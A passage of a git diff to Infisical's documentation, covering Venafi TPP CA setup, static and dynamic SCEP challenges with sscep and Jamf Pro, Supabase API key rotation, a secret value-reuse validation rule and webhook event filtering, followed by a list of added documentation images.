+ ![External CA Page](/images/platform/pki/venafi-tpp/venafi-tpp-external-ca-page.png) + + + Click **Create CA** and configure: + + - **Type**: Choose **Venafi TPP** + - **Name**: A friendly name for this CA (e.g., "Production TPP CA") + - **Status**: Set to **Active** to enable certificate issuance + - **Venafi TPP Connection**: Select your TPP connection from the dropdown + - **Policy DN**: The policy folder path in TPP where certificates will be managed (e.g., `\VED\Policy\Certificates\WebServers`) + + ![External CA Form](/images/platform/pki/venafi-tpp/venafi-tpp-external-ca-form.png) + + + The Policy DN must point to an existing policy folder in your TPP instance. The policy folder + determines which CA template is used for signing, what subject fields are allowed, and other + certificate constraints. Make sure the policy folder is configured to allow certificate requests + from the credentials used in your TPP connection. + + + + Your Venafi TPP CA is now ready. You can use it with certificate profiles to issue certificates. + ![External CA Created](/images/platform/pki/venafi-tpp/venafi-tpp-external-ca-created.png) + + + +## Issuing Certificates + +Once your Venafi TPP CA is set up, you issue certificates through **Certificate Profiles**: + + + + Go to **Policies** > **Certificate Profiles** and create a new profile: + + - Set the **Issuing CA** to your Venafi TPP CA + - Configure the **Enrollment Method** as **API** + - Set default certificate attributes (common name, SANs, key algorithm, TTL, etc.) + + ![Create Profile](/images/platform/pki/certificate/cert-profile-modal.png) + + + Go to **Certificates** and click **Issue Certificate**: + + - Select the profile linked to your Venafi TPP CA + - Fill in the certificate details (common name, SANs, TTL) + - Click **Issue** + + ![Issue Certificate](/images/platform/pki/certificate/cert-issue-modal.png) + + The certificate request is submitted to TPP asynchronously. 
Infisical will authenticate with TPP, submit the CSR to the configured policy folder, and retrieve the signed certificate. + + + Certificate issuance is asynchronous. Infisical will poll TPP for the signed certificate for + up to ~5 minutes. Ensure your TPP policy folder is configured for automatic approval. + + + + Your certificate has been issued by the TPP server and is ready for use. + ![Certificate Created](/images/platform/pki/venafi-tpp/venafi-tpp-certificate-created.png) + + diff --git a/docs/documentation/platform/pki/discovery/network.mdx b/docs/documentation/platform/pki/discovery/network.mdx index 44aba032d4c..247361e15ac 100644 --- a/docs/documentation/platform/pki/discovery/network.mdx +++ b/docs/documentation/platform/pki/discovery/network.mdx @@ -5,6 +5,10 @@ description: "Learn how to configure a Network discovery job to find certificate Network discovery scans network endpoints over TLS to discover certificates served by hosts across IP ranges and domains. Optionally, you can use an [Infisical Gateway](/documentation/platform/gateways/overview) to reach endpoints in private networks that are not accessible from the internet. + + If you are self-hosting Infisical, you can alternatively set the [`ALLOW_INTERNAL_IP_CONNECTIONS`](/self-hosting/configuration/envars#param-allow-internal-ip-connections) environment variable to `true` on your instance to scan private networks directly without a gateway. + + 1. Navigate to your Certificate Management Project > **Discovery** and press **Add Job**. 
diff --git a/docs/documentation/platform/pki/enrollment-methods/scep.mdx b/docs/documentation/platform/pki/enrollment-methods/scep.mdx index ba27c3aac56..662c08b6c02 100644 --- a/docs/documentation/platform/pki/enrollment-methods/scep.mdx +++ b/docs/documentation/platform/pki/enrollment-methods/scep.mdx @@ -27,6 +27,43 @@ For self-hosted Infisical instances, replace `app.infisical.com` with your insta - A SCEP-compatible client (e.g., [sscep](https://github.com/certnanny/sscep)) or a network device with built-in SCEP support. - A certificate profile with a **CA-issued** issuer type. +## Challenge Types + +Infisical supports two challenge authentication modes for SCEP enrollment: + + + + A single shared secret password is configured on the certificate profile. All SCEP clients must include this password in their certificate signing request (CSR) to authenticate. + + This is the simplest option and works well when the same challenge password is acceptable for all devices enrolling through the profile. + + - The challenge password must be at least 8 characters. + - The password is hashed before storage and cannot be retrieved after creation. + + + One-time-use challenge passwords are generated on demand via an authenticated API endpoint. Each challenge can only be used once and expires after a configurable time period. + + This mode is designed for MDM tools like **Jamf Pro** that support fetching a challenge from an external webhook before delivering the SCEP profile to a device. + + When dynamic challenges are enabled, Infisical exposes a challenge endpoint at: + + ``` + https://app.infisical.com/scep/{profile_id}/challenge + ``` + + The endpoint accepts authenticated `POST` requests and returns a plain-text one-time challenge password. The caller must authenticate using a [Machine Identity](/documentation/platform/identities/machine-identities) access token. 
+ + The following settings are part of the certificate profile configuration and apply to all challenges generated for this profile: + + - **Challenge Expiry (minutes)**: How long each generated challenge remains valid before expiring. Default: 60 minutes. Maximum: 1440 minutes (24 hours). + - **Max Pending Challenges**: Maximum number of unused challenges that can exist at once. Default: 100. Maximum: 1000. + + + Dynamic challenges are consumed on first use. Once a device successfully enrolls with a challenge, that challenge cannot be reused. Expired and used challenges are automatically cleaned up. + + + + ## Guide to Certificate Enrollment via SCEP In the following steps, we walk through how to issue an X.509 certificate using the SCEP enrollment method. @@ -37,7 +74,10 @@ In the following steps, we walk through how to issue an X.509 certificate using Here's some guidance on each SCEP-specific configuration field: - - **Challenge Password**: A shared secret that SCEP clients must include in their certificate signing request (CSR) to authenticate with Infisical's SCEP server. Must be at least 8 characters. + - **Challenge Type**: Select **Static** for a shared password or **Dynamic** for one-time-use challenges generated via API. See [Challenge Types](#challenge-types) above. + - **Challenge Password** (static only): A shared secret that SCEP clients must include in their certificate signing request (CSR) to authenticate with Infisical's SCEP server. Must be at least 8 characters. + - **Challenge Expiry** (dynamic only): How long each generated challenge remains valid, in minutes. + - **Max Pending Challenges** (dynamic only): Maximum number of unused challenges that can exist at once. - **Include CA Cert in Response**: When enabled, the CA certificate chain is included alongside the RA certificate in the GetCACert response. Most SCEP clients expect this to be enabled (default: enabled). 
- **Allow Certificate-Based Renewal**: When enabled, devices that already hold a valid certificate issued by the same CA can renew their certificate without providing the challenge password (default: enabled). @@ -53,79 +93,114 @@ In the following steps, we walk through how to issue an X.509 certificate using Where `{profile_id}` is the UUID of the certificate profile. This is the URL you provide to your SCEP clients as the SCEP server URL. + For profiles with **dynamic challenges** enabled, you will also see a **Challenge Endpoint URL**: + + ``` + https://app.infisical.com/scep/{profile_id}/challenge + ``` + + This is the URL your MDM tool or automation calls to generate one-time challenge passwords. + Provide the **SCEP endpoint URL** and **challenge password** from the previous steps to your SCEP client. - Below is an example using [sscep](https://github.com/certnanny/sscep), an open-source SCEP client. + + + Below is an example using [sscep](https://github.com/certnanny/sscep), an open-source SCEP client. - **1. Retrieve the CA/RA certificates:** + **1. Retrieve the CA/RA certificates:** - ```bash - sscep getca \ - -u https://app.infisical.com/scep/{profile_id}/pkiclient.exe \ - -c ca.pem - ``` + ```bash + sscep getca \ + -u https://app.infisical.com/scep/{profile_id}/pkiclient.exe \ + -c ca.pem + ``` - This writes the RA certificate to `ca.pem-0` and the CA certificate to `ca.pem-1` (when "Include CA Cert in Response" is enabled). + This writes the RA certificate to `ca.pem-0` and the CA certificate to `ca.pem-1` (when "Include CA Cert in Response" is enabled). - **2. Generate a device key and CSR with the challenge password:** + **2. Generate a device key and CSR with the challenge password:** - The challenge password must be embedded in the CSR as a PKCS#9 attribute. Create an OpenSSL config file to include it: + The challenge password must be embedded in the CSR as a PKCS#9 attribute. 
Create an OpenSSL config file to include it: - ```bash - cat > device-csr.cnf << 'EOF' - [req] - default_bits = 2048 - prompt = no - distinguished_name = dn - attributes = req_attributes - - [dn] - CN = my-device.example.com - - [req_attributes] - challengePassword = your-challenge-password - EOF - - # Generate the key and CSR - openssl genrsa -out device.key 2048 - openssl req -new -key device.key -out device.csr -config device-csr.cnf - ``` + ```bash + cat > device-csr.cnf << 'EOF' + [req] + default_bits = 2048 + prompt = no + distinguished_name = dn + attributes = req_attributes - **3. Create a self-signed certificate for the sscep signing identity:** + [dn] + CN = my-device.example.com - sscep requires a local signing certificate to sign the SCEP request envelope: + [req_attributes] + challengePassword = your-challenge-password + EOF - ```bash - openssl x509 -req -in device.csr -signkey device.key \ - -out device-selfsigned.pem -days 1 - ``` + # Generate the key and CSR + openssl genrsa -out device.key 2048 + openssl req -new -key device.key -out device.csr -config device-csr.cnf + ``` - **4. Enroll via SCEP:** + **3. Create a self-signed certificate for the sscep signing identity:** - ```bash - sscep enroll \ - -u https://app.infisical.com/scep/{profile_id}/pkiclient.exe \ - -c ca.pem-0 \ - -k device.key \ - -r device.csr \ - -l device-cert.pem \ - -K device.key \ - -O device-selfsigned.pem \ - -E aes256 \ - -S sha256 - ``` + sscep requires a local signing certificate to sign the SCEP request envelope: - On success, the issued certificate is written to `device-cert.pem`. 
+ ```bash + openssl x509 -req -in device.csr -signkey device.key \ + -out device-selfsigned.pem -days 1 + ``` - - Flag reference for the enroll command: - - `-c ca.pem-0` is the RA certificate from step 1 - - `-K` / `-O` are the signing key and self-signed certificate used to sign the SCEP message envelope - - `-E aes256` selects AES-256-CBC encryption - - `-S sha256` selects SHA-256 for the message digest - + **4. Enroll via SCEP:** + + ```bash + sscep enroll \ + -u https://app.infisical.com/scep/{profile_id}/pkiclient.exe \ + -c ca.pem-0 \ + -k device.key \ + -r device.csr \ + -l device-cert.pem \ + -K device.key \ + -O device-selfsigned.pem \ + -E aes256 \ + -S sha256 + ``` + + On success, the issued certificate is written to `device-cert.pem`. + + + Flag reference for the enroll command: + - `-c ca.pem-0` is the RA certificate from step 1 + - `-K` / `-O` are the signing key and self-signed certificate used to sign the SCEP message envelope + - `-E aes256` selects AES-256-CBC encryption + - `-S sha256` selects SHA-256 for the message digest + + + + For dynamic challenges, you first generate a one-time challenge password via the API, then use it as the challenge password in the SCEP enrollment. + + **1. Generate a dynamic challenge:** + + ```bash + curl -s -X POST \ + https://app.infisical.com/scep/{profile_id}/challenge \ + -H "Authorization: Bearer " + ``` + + The response body is the plain-text challenge password. Save it for use in the enrollment. + + **2. Use the challenge in your SCEP enrollment:** + + Follow the same steps as the static challenge flow above, but use the dynamically generated challenge password instead of a fixed one. + + + Each dynamic challenge can only be used once. If enrollment fails, generate a new challenge and retry. + + + For MDM integrations (Jamf Pro, Ivanti, etc.), the MDM tool handles this automatically via webhook. See the [Jamf Pro integration guide](/documentation/platform/pki/integration-guides/jamf-pro-scep) for details. 
+ + SCEP uses CMS/PKCS#7 encrypted messages to protect the certificate request in transit. The challenge password is included inside the encrypted envelope and is never sent in plaintext over the network. @@ -173,6 +248,11 @@ Infisical's SCEP server supports the following algorithms for the CMS message ex The RA (Registration Authority) certificate is automatically generated when you create a SCEP-enabled certificate profile. It is used to encrypt and sign the SCEP message exchange between the client and server. The RA certificate has a 10-year validity and is separate from your CA certificate. + + Use **static challenges** for simple setups where a shared password is acceptable, such as network devices or test environments. + + Use **dynamic challenges** when integrating with MDM tools (Jamf Pro, Ivanti, Workspace ONE) that support fetching one-time challenges via webhook. Dynamic challenges provide stronger security since each challenge can only be used once and expires automatically. + Yes, if **Allow Certificate-Based Renewal** is enabled on the certificate profile. Devices that already hold a valid certificate issued by the same CA can submit a renewal request (RenewalReq) signed with their existing certificate, without needing the challenge password. diff --git a/docs/documentation/platform/pki/integration-guides/jamf-pro-scep.mdx b/docs/documentation/platform/pki/integration-guides/jamf-pro-scep.mdx index fcaea5d1aac..8d4b6723aeb 100644 --- a/docs/documentation/platform/pki/integration-guides/jamf-pro-scep.mdx +++ b/docs/documentation/platform/pki/integration-guides/jamf-pro-scep.mdx @@ -7,6 +7,8 @@ This guide demonstrates how to use Infisical to issue and distribute certificate With this integration, Jamf Pro acts as the SCEP client on behalf of your managed devices, once a configuration profile is saved and scoped, enrolled devices automatically receive certificates issued by your Infisical Certificate Manager without any manual intervention on the device. 
+Infisical supports both **static** and **dynamic** SCEP challenges with Jamf Pro. Dynamic challenges provide stronger security by generating a unique, one-time-use challenge password for each device enrollment. + ## Prerequisites Before you begin, make sure you have: @@ -14,6 +16,7 @@ Before you begin, make sure you have: - A [Jamf Pro](https://www.jamf.com/products/jamf-pro/) instance with administrative access. - A [certificate profile](/documentation/platform/pki/certificates/profiles) configured with the [SCEP enrollment method](/documentation/platform/pki/enrollment-methods/scep) in Infisical. Refer to the [SCEP enrollment guide](/documentation/platform/pki/enrollment-methods/scep) for setup instructions. - One or more computers or mobile devices enrolled in Jamf Pro. +- For **dynamic challenges**: A [Machine Identity](/documentation/platform/identities/machine-identities) with access to the project containing the certificate profile. ## Guide @@ -24,7 +27,34 @@ Before you begin, make sure you have: From the certificate profile, gather the following values: - **SCEP URL**: The SCEP endpoint URL for your certificate profile. This takes the form `https://app.infisical.com/scep/{profile_id}/pkiclient.exe`. For self-hosted instances, replace `app.infisical.com` with your instance's domain. - - **Challenge Password**: The shared secret configured on the SCEP enrollment method. + + + + - **Challenge Password**: The shared secret configured on the SCEP enrollment method. + + + - **Challenge Endpoint URL**: The authenticated endpoint for generating one-time challenges. This takes the form `https://app.infisical.com/scep/{profile_id}/challenge`. + - **Machine Identity Access Token**: An access token for a Machine Identity with permissions on the project. You can obtain this by authenticating a [Machine Identity](/documentation/platform/identities/machine-identities) configured with [Token Auth](/documentation/platform/identities/token-auth). 
+ + With dynamic challenges, Jamf Pro calls a webhook to fetch a one-time challenge password for each device enrollment. Configure this webhook now: + + ![Jamf Pro webhook configuration for SCEP challenges](/images/platform/pki/integrations/jamf-pro/jamf-webhook-config.png) + + 1. In Jamf Pro, navigate to **Settings** > **Global Management** > **Webhooks**. + 2. Click **+ New** to create a new webhook. + 3. Configure the webhook with the following settings: + - **Display Name**: A descriptive name (e.g., `Infisical SCEP Challenge`). + - **Enabled**: Check this box. + - **Webhook URL**: Enter the **Challenge Endpoint URL** from above. + - **Authentication Type**: Select **Header Authentication**. + - **Header Name**: Enter `Authorization`. + - **Header Value**: Enter `Bearer `. + - **Content Type**: Select **JSON**. + - **Webhook Event**: Select **SCEPChallenge**. + 4. Click **Save**. + + + @@ -63,13 +93,20 @@ Before you begin, make sure you have: Next, configure the challenge authentication: - + - **Challenge Type**: Select **Static** from the dropdown. - **Challenge**: Enter the **Challenge Password** from your Infisical certificate profile. - **Verify Challenge**: Re-enter the challenge password to confirm. ![SCEP configuration β€” Challenge and certificate options](/images/platform/pki/integrations/jamf-pro/scep-config-challenge.png) + + - **Challenge Type**: Select **Dynamic** from the dropdown. + + No manual challenge password entry is needed, Jamf Pro automatically calls the webhook configured in step 1 to fetch a one-time challenge for each device enrollment. 
+ + ![SCEP configuration β€” Dynamic challenge type selected](/images/platform/pki/integrations/jamf-pro/scep-config-challenge-dynamic.png) + Finally, configure the remaining certificate options: diff --git a/docs/documentation/platform/secret-rotation/supabase-api-key.mdx b/docs/documentation/platform/secret-rotation/supabase-api-key.mdx new file mode 100644 index 00000000000..c4b95b293ec --- /dev/null +++ b/docs/documentation/platform/secret-rotation/supabase-api-key.mdx @@ -0,0 +1,124 @@ +--- +title: "Supabase API Key" +description: "Learn how to automatically rotate Supabase API keys." +--- + + + **Rotation Type: Dual-Phase** + + This rotation maintains two active credential sets with overlapping validity, ensuring zero-downtime during rotation cycles. + + +## Prerequisites + +- Create a [Supabase Connection](/integrations/app-connections/supabase). That connection is used to create and delete API keys on your behalf during rotation. + +## Create a Supabase API Key Rotation in Infisical + + + + 1. Navigate to your Secret Manager Project's Dashboard and select **Add Secret Rotation** from the actions dropdown. + + ![Secret Manager Dashboard](/images/secret-rotations-v2/generic/add-secret-rotation.png) + + 2. Select the **Supabase API Key** option. + + ![Select Supabase API Key](/images/secret-rotations-v2/supabase-api-key/select-supabase-api-key.png) + + 3. Configure the rotation behavior, then click **Next**. + + - **Supabase Connection** – The connection that will create and delete API keys during rotation. + - **Rotation Interval** – The interval, in days, after which a rotation is triggered. + - **Rotate At** – The local time of day when rotation runs once the interval has elapsed. + - **Auto-Rotation Enabled** – Whether to rotate automatically on the interval. Turn off to rotate only manually or pause rotation. + + ![Rotation Configuration](/images/secret-rotations-v2/supabase-api-key/configuration.png) + + 4. 
Set the Supabase API key parameters, then click **Next**. + + - **Project** – The Supabase project to rotate the API key for. + - **Key Type** – The type of the API key to rotate: + - `publishable` – The public `anon` key, safe to expose in client-side code. It is used with Row Level Security (RLS) policies to control per-user access. + - `secret` – The `service_role` key, which bypasses RLS entirely and has full access to your project's data. Must be kept server-side only. + + ![Rotation Parameters](/images/secret-rotations-v2/supabase-api-key/parameters.png) + + 5. Specify the secret name that the rotated API key will be mapped to. Then click **Next**. + + - **API Key** – The name of the secret in Infisical where the rotated API key value will be stored. + + ![Rotation Secrets Mapping](/images/secret-rotations-v2/supabase-api-key/secrets-mapping.png) + + 6. Give your rotation a name and description (optional). Then click **Next**. + + - **Name** – A slug-friendly name for this rotation configuration. + - **Description** (optional) – Notes about this rotation. + + ![Rotation Details](/images/secret-rotations-v2/supabase-api-key/details.png) + + 7. Review your configuration, then click **Create Secret Rotation**. + + ![Rotation Review](/images/secret-rotations-v2/supabase-api-key/review.png) + + 8. Your **Supabase API Key** rotation is created. The current API key is available as a secret at the mapped path. Rotations will create a new key, switch the active secret to it, then revoke the previous key for zero-downtime rotation. + + ![Rotation Created](/images/secret-rotations-v2/supabase-api-key/created.png) + + + To create a Supabase API Key rotation, call the [Create Supabase API Key Rotation](/api-reference/endpoints/secret-rotations/supabase-api-key/create) API endpoint. 
+ + ### Sample request + + ```bash Request + curl --request POST \ + --url https://us.infisical.com/api/v2/secret-rotations/supabase-api-key \ + --header 'Content-Type: application/json' \ + --data '{ + "name": "my-supabase-rotation", + "projectId": "", + "description": "Supabase API key rotation", + "connectionId": "", + "environment": "dev", + "secretPath": "/", + "isAutoRotationEnabled": true, + "rotationInterval": 30, + "rotateAtUtc": { + "hours": 0, + "minutes": 0 + }, + "parameters": { + "projectRef": "", + "keyType": "secret" + }, + "secretsMapping": { + "apiKey": "SUPABASE_API_KEY" + } + }' + ``` + + ### Sample response + + ```bash Response + { + "secretRotation": { + "id": "", + "name": "my-supabase-rotation", + "description": "Supabase API key rotation", + "secretsMapping": { + "apiKey": "SUPABASE_API_KEY" + }, + "isAutoRotationEnabled": true, + "activeIndex": 0, + "connectionId": "", + "rotationInterval": 30, + "rotateAtUtc": { "hours": 0, "minutes": 0 }, + "type": "supabase-api-key", + "parameters": { + "projectRef": "", + "keyType": "secret" + } + } + } + ``` + + diff --git a/docs/documentation/platform/secret-validation-rules.mdx b/docs/documentation/platform/secret-validation-rules.mdx index d977528bad1..3075d464680 100644 --- a/docs/documentation/platform/secret-validation-rules.mdx +++ b/docs/documentation/platform/secret-validation-rules.mdx @@ -29,8 +29,9 @@ Each rule contains one or more constraints. A constraint specifies what to check | **Regex Pattern** | The target must match a regular expression | Key must match `^[A-Z][A-Z0-9_]*$` | | **Required Prefix** | The target must start with specific text | Value must start with `https://` | | **Required Suffix** | The target must end with specific text | Key must end with `_SECRET` | +| **Prevent Value Reuse** | The new value must not match any of the last N versions | Value must not match the last 10 versions | -Each constraint can be applied to either the secret key or the secret value. 
+Each constraint _(except Prevent Value Reuse)_ can be applied to either the secret key or the secret value. **Prevent Value Reuse** applies only to the secret value. ### Scoping Rules @@ -68,7 +69,7 @@ This means you can have different validation standards for different parts of yo **Constraints** - Click **Add Constraint** and choose from the available constraint types. For each constraint, select whether it applies to the secret **key** or **value**, then provide the constraint parameter (length, pattern, prefix, or suffix). + Click **Add Constraint** and choose from the available constraint types. For each constraint, select whether it applies to the secret **key** or **value**, then provide the constraint parameter (length, pattern, prefix, suffix, or number of previous versions). You can add multiple constraints to a single rule. All constraints must pass for a secret to be accepted. @@ -120,4 +121,12 @@ For example, you cannot have two separate "Regex Pattern on key" constraints in This helps distinguish production secrets from those in other environments. + + + Create a rule with a **Prevent Value Reuse** constraint on the **secret value**: + + - Previous versions: `10` + + When a secret is updated, its new value is validated against the specified number of prior versions. This is useful for enforcing rotation policies and ensuring that secrets are not recycled. + diff --git a/docs/documentation/platform/webhooks.mdx b/docs/documentation/platform/webhooks.mdx index 924dda87a7f..61534953225 100644 --- a/docs/documentation/platform/webhooks.mdx +++ b/docs/documentation/platform/webhooks.mdx @@ -23,6 +23,15 @@ The header will be in the format `t=;`. You can then gener If the signature in the header matches the signature that you generated, then you can be sure that the request was sent by Infisical and is intended for your integration. The timestamp in the header ensures that the request is not replayed. 
+## Event Filtering + +By default, webhooks trigger on every supported event. You can narrow this down under **Advanced Settings** when creating a webhook, and only receive the events you care about. You can also change the events on existing webhooks by clicking **Edit** and selecting the events you want. + +Supported events: + +- **Secret Modified** (`secrets.modified`) β€” triggered when secrets in the configured scope are created, updated, or deleted. +- **Secret Rotation Failed** (`secrets.rotation-failed`) β€” triggered when a secret rotation in the configured scope fails. + ### Webhook Payload Format ```json @@ -39,20 +48,6 @@ If the signature in the header matches the signature that you generated, then yo } ``` -```json -{ - "event": "secrets.reminder-expired", - "project": { - "workspaceId": "the workspace id", - "environment": "project environment", - "secretPath": "project folder path", - "secretName": "name of the secret", - "secretId": "id of the secret", - "reminderNote": "reminder note of the secret" - }, - "timestamp": "" -} -``` ```json { diff --git a/docs/images/app-connections/digicert/add-connection.png b/docs/images/app-connections/digicert/add-connection.png new file mode 100644 index 00000000000..e6347f62b1f Binary files /dev/null and b/docs/images/app-connections/digicert/add-connection.png differ diff --git a/docs/images/app-connections/digicert/digicert-app-connection-created.png b/docs/images/app-connections/digicert/digicert-app-connection-created.png new file mode 100644 index 00000000000..106b3900e66 Binary files /dev/null and b/docs/images/app-connections/digicert/digicert-app-connection-created.png differ diff --git a/docs/images/app-connections/digicert/digicert-app-connection-form.png b/docs/images/app-connections/digicert/digicert-app-connection-form.png new file mode 100644 index 00000000000..37fd99b71d8 Binary files /dev/null and b/docs/images/app-connections/digicert/digicert-app-connection-form.png differ diff --git 
a/docs/images/app-connections/digicert/digicert-app-connection-option.png b/docs/images/app-connections/digicert/digicert-app-connection-option.png new file mode 100644 index 00000000000..5be60c196a1 Binary files /dev/null and b/docs/images/app-connections/digicert/digicert-app-connection-option.png differ diff --git a/docs/images/app-connections/digicert/step-1.png b/docs/images/app-connections/digicert/step-1.png new file mode 100644 index 00000000000..9898c9e89bb Binary files /dev/null and b/docs/images/app-connections/digicert/step-1.png differ diff --git a/docs/images/app-connections/digicert/step-2.png b/docs/images/app-connections/digicert/step-2.png new file mode 100644 index 00000000000..e5e71e0bb34 Binary files /dev/null and b/docs/images/app-connections/digicert/step-2.png differ diff --git a/docs/images/app-connections/doppler/copy-the-generated-code.png b/docs/images/app-connections/doppler/copy-the-generated-code.png new file mode 100644 index 00000000000..89736b87ff2 Binary files /dev/null and b/docs/images/app-connections/doppler/copy-the-generated-code.png differ diff --git a/docs/images/app-connections/doppler/create-api-token.png b/docs/images/app-connections/doppler/create-api-token.png new file mode 100644 index 00000000000..30c0695d814 Binary files /dev/null and b/docs/images/app-connections/doppler/create-api-token.png differ diff --git a/docs/images/app-connections/doppler/doppler-app-connection-created.png b/docs/images/app-connections/doppler/doppler-app-connection-created.png new file mode 100644 index 00000000000..e969cb4aa2b Binary files /dev/null and b/docs/images/app-connections/doppler/doppler-app-connection-created.png differ diff --git a/docs/images/app-connections/doppler/doppler-app-connection-form.png b/docs/images/app-connections/doppler/doppler-app-connection-form.png new file mode 100644 index 00000000000..1074fd32af0 Binary files /dev/null and b/docs/images/app-connections/doppler/doppler-app-connection-form.png differ diff 
--git a/docs/images/app-connections/doppler/doppler-app-connection-option.png b/docs/images/app-connections/doppler/doppler-app-connection-option.png new file mode 100644 index 00000000000..a0982bf7223 Binary files /dev/null and b/docs/images/app-connections/doppler/doppler-app-connection-option.png differ diff --git a/docs/images/app-connections/doppler/doppler-create-service-account.png b/docs/images/app-connections/doppler/doppler-create-service-account.png new file mode 100644 index 00000000000..858ebcc7040 Binary files /dev/null and b/docs/images/app-connections/doppler/doppler-create-service-account.png differ diff --git a/docs/images/app-connections/doppler/doppler-dashboard.png b/docs/images/app-connections/doppler/doppler-dashboard.png new file mode 100644 index 00000000000..cc1a50a90a2 Binary files /dev/null and b/docs/images/app-connections/doppler/doppler-dashboard.png differ diff --git a/docs/images/app-connections/doppler/doppler-service-account-configure-role.png b/docs/images/app-connections/doppler/doppler-service-account-configure-role.png new file mode 100644 index 00000000000..fa956f6176e Binary files /dev/null and b/docs/images/app-connections/doppler/doppler-service-account-configure-role.png differ diff --git a/docs/images/app-connections/doppler/doppler-service-account-select-role.png b/docs/images/app-connections/doppler/doppler-service-account-select-role.png new file mode 100644 index 00000000000..b23e25dc2f9 Binary files /dev/null and b/docs/images/app-connections/doppler/doppler-service-account-select-role.png differ diff --git a/docs/images/app-connections/doppler/manage-service-accounts.png b/docs/images/app-connections/doppler/manage-service-accounts.png new file mode 100644 index 00000000000..f02f4b66047 Binary files /dev/null and b/docs/images/app-connections/doppler/manage-service-accounts.png differ diff --git a/docs/images/app-connections/doppler/service-account-api-token-creation.png 
b/docs/images/app-connections/doppler/service-account-api-token-creation.png new file mode 100644 index 00000000000..3004d7888f9 Binary files /dev/null and b/docs/images/app-connections/doppler/service-account-api-token-creation.png differ diff --git a/docs/images/app-connections/ona/ona-access-token-tab.png b/docs/images/app-connections/ona/ona-access-token-tab.png new file mode 100644 index 00000000000..8d232380e08 Binary files /dev/null and b/docs/images/app-connections/ona/ona-access-token-tab.png differ diff --git a/docs/images/app-connections/ona/ona-account-settings.png b/docs/images/app-connections/ona/ona-account-settings.png new file mode 100644 index 00000000000..17530a7796d Binary files /dev/null and b/docs/images/app-connections/ona/ona-account-settings.png differ diff --git a/docs/images/app-connections/ona/ona-app-connection-form.png b/docs/images/app-connections/ona/ona-app-connection-form.png new file mode 100644 index 00000000000..9530b81d29c Binary files /dev/null and b/docs/images/app-connections/ona/ona-app-connection-form.png differ diff --git a/docs/images/app-connections/ona/ona-app-connection-generated.png b/docs/images/app-connections/ona/ona-app-connection-generated.png new file mode 100644 index 00000000000..91044948a59 Binary files /dev/null and b/docs/images/app-connections/ona/ona-app-connection-generated.png differ diff --git a/docs/images/app-connections/ona/ona-app-connection-option.png b/docs/images/app-connections/ona/ona-app-connection-option.png new file mode 100644 index 00000000000..6edabc49de7 Binary files /dev/null and b/docs/images/app-connections/ona/ona-app-connection-option.png differ diff --git a/docs/images/app-connections/ona/ona-pat-copy.png b/docs/images/app-connections/ona/ona-pat-copy.png new file mode 100644 index 00000000000..57025a976e9 Binary files /dev/null and b/docs/images/app-connections/ona/ona-pat-copy.png differ diff --git a/docs/images/app-connections/ona/ona-pat-creation-modal.png 
b/docs/images/app-connections/ona/ona-pat-creation-modal.png new file mode 100644 index 00000000000..16c2b351ed7 Binary files /dev/null and b/docs/images/app-connections/ona/ona-pat-creation-modal.png differ diff --git a/docs/images/app-connections/ona/ona-pat-section.png b/docs/images/app-connections/ona/ona-pat-section.png new file mode 100644 index 00000000000..d821e671c41 Binary files /dev/null and b/docs/images/app-connections/ona/ona-pat-section.png differ diff --git a/docs/images/app-connections/travis-ci/travis-ci-app-connection-modal.png b/docs/images/app-connections/travis-ci/travis-ci-app-connection-modal.png new file mode 100644 index 00000000000..62cb11a9f1e Binary files /dev/null and b/docs/images/app-connections/travis-ci/travis-ci-app-connection-modal.png differ diff --git a/docs/images/app-connections/travis-ci/travis-ci-app-connection-option.png b/docs/images/app-connections/travis-ci/travis-ci-app-connection-option.png new file mode 100644 index 00000000000..d387b59c051 Binary files /dev/null and b/docs/images/app-connections/travis-ci/travis-ci-app-connection-option.png differ diff --git a/docs/images/app-connections/travis-ci/travis-ci-copy-token.png b/docs/images/app-connections/travis-ci/travis-ci-copy-token.png new file mode 100644 index 00000000000..38f9879c723 Binary files /dev/null and b/docs/images/app-connections/travis-ci/travis-ci-copy-token.png differ diff --git a/docs/images/platform/external-migrations/doppler-in-platform/doppler-connection-modal.png b/docs/images/platform/external-migrations/doppler-in-platform/doppler-connection-modal.png new file mode 100644 index 00000000000..9beb04a1a94 Binary files /dev/null and b/docs/images/platform/external-migrations/doppler-in-platform/doppler-connection-modal.png differ diff --git a/docs/images/platform/external-migrations/doppler-in-platform/import-doppler-secret-overview-modal.png b/docs/images/platform/external-migrations/doppler-in-platform/import-doppler-secret-overview-modal.png 
new file mode 100644 index 00000000000..6d3e77840ab Binary files /dev/null and b/docs/images/platform/external-migrations/doppler-in-platform/import-doppler-secret-overview-modal.png differ diff --git a/docs/images/platform/external-migrations/doppler-in-platform/import-doppler-secret-overview-option.png b/docs/images/platform/external-migrations/doppler-in-platform/import-doppler-secret-overview-option.png new file mode 100644 index 00000000000..456d7491f6d Binary files /dev/null and b/docs/images/platform/external-migrations/doppler-in-platform/import-doppler-secret-overview-option.png differ diff --git a/docs/images/platform/external-migrations/doppler-in-platform/select-doppler-provider.png b/docs/images/platform/external-migrations/doppler-in-platform/select-doppler-provider.png new file mode 100644 index 00000000000..fa08408f2f9 Binary files /dev/null and b/docs/images/platform/external-migrations/doppler-in-platform/select-doppler-provider.png differ diff --git a/docs/images/platform/external-migrations/vault-in-platform/import-vault-secrets-modal.png b/docs/images/platform/external-migrations/vault-in-platform/import-vault-secrets-modal.png index 3bfe6428b46..80ee2f56cdb 100644 Binary files a/docs/images/platform/external-migrations/vault-in-platform/import-vault-secrets-modal.png and b/docs/images/platform/external-migrations/vault-in-platform/import-vault-secrets-modal.png differ diff --git a/docs/images/platform/external-migrations/vault-in-platform/namespace-configuration-modal.png b/docs/images/platform/external-migrations/vault-in-platform/namespace-configuration-modal.png index 828b825445d..a9c04667cd6 100644 Binary files a/docs/images/platform/external-migrations/vault-in-platform/namespace-configuration-modal.png and b/docs/images/platform/external-migrations/vault-in-platform/namespace-configuration-modal.png differ diff --git a/docs/images/platform/external-migrations/vault-in-platform/select-migration-provider.png 
